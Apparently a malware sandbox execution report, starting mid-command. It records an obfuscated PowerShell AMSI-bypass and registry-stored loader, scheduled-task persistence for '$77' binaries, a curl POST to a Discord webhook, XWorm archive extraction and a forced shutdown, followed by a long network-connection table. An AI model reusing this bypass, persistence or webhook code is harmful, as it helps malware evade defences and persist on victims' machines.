@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FUdCvLhuypo=$wrKoaJuctLjFo.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'32'+'.'+''+[Char](100)+'l'+[Char](108)+'')));$kISoJahlEZayRd=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object]('Lo'+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$YFkSeGHziLwnHaMZL=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$hKSadWt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kISoJahlEZayRd,$aAimDKIDCiENaekgzNL).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uPCrjwIokZiHlzXfl=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$hKSadWt,[Object]('A'+'m'+''+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'uff'+[Char](101)+''+[Char](114)+'')));$DrKsXoMSIW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,4,[ref]$DrKsXoMSIW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uPCrjwIokZiHlzXfl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,0x20,[ref]$DrKsXoMSIW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1923dcfb-2d6d-4177-b724-07d1bfc48873}
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp79AF.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5984 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied.
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe
"C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe" x "C:\Windows\Resources\xworm fixed.zip" -o"C:\Windows\Resources\xworm fixed" -y
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\SYSTEM32\shutdown.exe
shutdown.exe /f /s /t 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3998855 /state1:0x41c64e6d
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 104.20.138.65:443 | tinyurl.com | tcp |
| US | 104.20.138.65:443 | tinyurl.com | tcp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 172.67.170.144:443 | www.ezojs.com | tcp |
| GB | 18.154.84.84:443 | cdn.amplitude.com | tcp |
| US | 172.67.199.186:443 | the.gatekeeperconsent.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| GB | 142.250.187.238:443 | translate.google.com | tcp |
| US | 104.16.52.110:443 | otnolatrnup.com | tcp |
| US | 172.67.199.186:443 | the.gatekeeperconsent.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | 65.138.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.42.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.199.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.52.16.104.in-addr.arpa | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 44.237.166.29:443 | api.amplitude.com | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| GB | 216.58.212.202:443 | translate-pa.googleapis.com | tcp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| US | 172.67.142.121:443 | g.ezodn.com | tcp |
| US | 172.67.142.121:443 | g.ezodn.com | tcp |
| US | 172.67.142.121:443 | g.ezodn.com | tcp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| US | 172.67.142.121:443 | g.ezodn.com | udp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 172.67.142.121:443 | g.ezodn.com | tcp |
| IE | 54.72.245.162:443 | sync.crwdcntrl.net | tcp |
| GB | 18.245.143.118:443 | tags.crwdcntrl.net | tcp |
| IE | 52.17.55.191:443 | sync.crwdcntrl.net | tcp |
| GB | 216.58.212.202:443 | translate-pa.googleapis.com | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 172.67.142.121:443 | g.ezodn.com | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.245.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.55.17.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| GB | 185.83.69.58:443 | ghb.adtelligent.com | tcp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| GB | 108.138.217.48:443 | hb.yellowblue.io | tcp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 172.67.14.119:443 | csync.smilewanted.com | tcp |
| US | 172.67.14.119:443 | csync.smilewanted.com | tcp |
| US | 172.67.14.119:443 | csync.smilewanted.com | tcp |
| US | 172.67.14.119:443 | csync.smilewanted.com | tcp |
| US | 172.67.14.119:443 | csync.smilewanted.com | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| GB | 18.245.254.89:443 | cdn.prod.uidapi.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 104.18.22.145:443 | cadmus.script.ac | tcp |
| GB | 185.83.69.58:443 | ghb.adtelligent.com | tcp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.254.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.83.36.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.22.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.69.83.185.in-addr.arpa | udp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 185.239.172.170:443 | ghb.adtelligent.com | tcp |
| US | 34.120.107.143:443 | oajs.openx.net | udp |
| GB | 172.217.169.65:443 | 0d6f0f64d52398de741fafb5f1e6c9c8.safeframe.googlesyndication.com | tcp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 104.16.53.110:443 | otnolatrnup.com | udp |
| US | 199.91.152.82:443 | download1582.mediafire.com | tcp |
| US | 199.91.152.82:443 | download1582.mediafire.com | tcp |
| BE | 104.90.24.23:443 | contextual.media.net | tcp |
| BE | 104.90.24.23:443 | contextual.media.net | udp |
| US | 104.16.53.110:80 | otnolatrnup.com | tcp |
| US | 104.16.53.110:80 | otnolatrnup.com | tcp |
| GB | 2.21.188.27:443 | hbx.media.net | tcp |
| GB | 2.21.188.27:443 | hbx.media.net | tcp |
| GB | 18.165.227.8:443 | woreppercomming.com | tcp |
| GB | 2.21.188.27:443 | hbx.media.net | udp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | tcp |
| BE | 2.17.198.179:443 | qsearch-a.akamaihd.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 79.127.216.47:443 | id.a-mx.com | tcp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| US | 23.53.112.234:443 | ads.pubmatic.com | tcp |
| DK | 37.157.2.230:443 | cm.adform.net | tcp |
| US | 172.67.174.4:443 | www.ovardu.com | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| US | 104.18.38.76:443 | js-sec.indexww.com | tcp |
| FR | 185.255.84.153:443 | visitor.omnitagjs.com | tcp |
| DE | 18.158.93.133:443 | www.opera.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| US | 104.19.158.19:443 | assets.a-mo.net | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.245:443 | a-prebid.vidoomy.com | tcp |
| ES | 212.36.83.245:443 | a-prebid.vidoomy.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| DE | 141.95.98.65:443 | lb.eu-1-id5-sync.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | udp |
| IE | 34.247.129.145:443 | ap.lijit.com | tcp |
| NL | 89.149.192.196:443 | ssbsync-global.smartadserver.com | tcp |
| DE | 37.252.173.215:443 | ib.adnxs.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 63.35.62.78:443 | pr-bh.ybp.yahoo.com | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| ES | 212.36.83.246:443 | a-prebid.vidoomy.com | tcp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| GB | 185.83.71.234:443 | sync.adtelligent.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 54.147.216.107:443 | sync.srv.stackadapt.com | tcp |
| US | 54.147.216.107:443 | sync.srv.stackadapt.com | tcp |
| US | 54.147.216.107:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| US | 34.160.236.64:443 | odr.mookie1.com | tcp |
| US | 216.200.232.253:443 | sync.mathtag.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| NL | 188.42.34.64:443 | ads.betweendigital.com | tcp |
| US | 80.77.87.161:443 | cs.admanmedia.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| NL | 185.89.210.244:443 | secure.adnxs.com | tcp |
| NL | 185.89.210.244:443 | secure.adnxs.com | tcp |
| US | 104.22.51.98:443 | spl.zeotap.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 54.147.216.107:443 | sync.srv.stackadapt.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| GB | 18.164.68.59:443 | api-2-0.spot.im | tcp |
| US | 64.74.236.255:443 | b1sync.zemanta.com | tcp |
| IE | 34.240.216.83:443 | match.prod.bidr.io | tcp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| US | 8.8.8.8:53 | 65.98.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.83.36.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.129.247.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.173.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.62.35.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.192.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.71.83.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.216.147.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.236.160.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.34.42.188.in-addr.arpa | udp |
| US | 80.77.87.161:443 | cs.admanmedia.com | tcp |
| GB | 104.91.71.145:443 | player.aniview.com | tcp |
| US | 67.202.105.24:443 | ssc-cms.33across.com | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| FR | 91.134.110.136:443 | sync.smartadserver.com | tcp |
| ES | 23.60.223.190:443 | secure-assets.rubiconproject.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| US | 52.46.151.131:443 | s.amazon-adsystem.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
| US | 34.230.93.105:443 | cs-server-s2s.yellowblue.io | tcp |
| IE | 34.250.70.143:443 | jadserve.postrelease.com | tcp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| BE | 104.90.26.20:443 | eus.rubiconproject.com | tcp |
| US | 34.193.171.116:443 | pxl.iqm.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| FR | 91.134.110.136:443 | sync.smartadserver.com | tcp |
| FR | 91.134.110.136:443 | sync.smartadserver.com | tcp |
| FR | 91.134.110.136:443 | sync.smartadserver.com | tcp |
| IE | 67.220.226.238:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| DK | 37.157.6.243:443 | c1.adform.net | tcp |
| NL | 35.214.216.135:443 | csync.loopme.me | tcp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 35.186.193.173:443 | cm.ctnsnet.com | tcp |
| US | 34.96.71.22:443 | s.company-target.com | tcp |
| NL | 89.207.16.204:443 | pubmatic-match.dotomi.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
